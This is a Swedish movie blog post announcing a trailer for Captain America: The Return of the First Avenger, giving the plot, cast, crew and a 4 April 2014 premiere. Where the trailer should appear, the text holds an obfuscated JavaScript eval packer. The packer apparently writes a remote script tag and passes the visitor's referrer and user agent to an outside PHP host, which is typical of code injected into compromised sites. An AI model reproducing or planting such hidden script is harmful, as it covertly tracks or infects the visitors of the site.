Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Trailer för Marvel’s Captain America: The Return of the First Avenger!

Sebastian

I Marvel’s Captain America: The Return of the First Avenger återhämtar sig Steve Rogers i Washington efter de tumultartade händelserna i New York i The Avengers. Men när en S.H.I.E.L.D-kollega attackeras dras Steve in i ett nät av intriger som hotar hela världen. Tillsammans med Black Widow måste han nysta upp konspirationen och försvara sig mot lönnmördare bakom varje hörn. Men när allt avslöjas måste Captain America och Black Widow ta hjälp av en ny bundsförvant, The Falcon. Men snart står de klart att de har att göra med en oväntad och formidabel fiende — The Winter Soldier.

Baserad på Marvels populära serie som först publicerades 1941. Marvel’s Captain America: The Return of the First Avenger är producerad av Kevin Feige, regisserad av Anthony och Joe Russo, skriven av Christopher Markus och Stephen McFeely och i rollerna ser vi Chris Evans, Scarlett Johansson, Sebastian Stan, Anthony Mackie, Cobie Smulders, Frank Grillo, Amily VanCamp och Hayley Atwell, med Robert Redford som Alexander Pierce och Samuel L. Jacksson som Nick Fury.

Captain America: The Return of the First Avenger presenteras av Marvel Studios. Exekutiva producenter är Louis D’Esposito, Victoria Alonso, Michael Grillo, Alan Fine och Stan Lee. Filmen har biopreiär den 4 april 2014 och distribueras av Walt Disney Studios Motion Pictures.

Trailern eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nikye|var|u0026u|referrer|rhfen||js|php’.split(’|’),0,{}))
kan ni se ovan!

Biopremiär den 4 april 2014!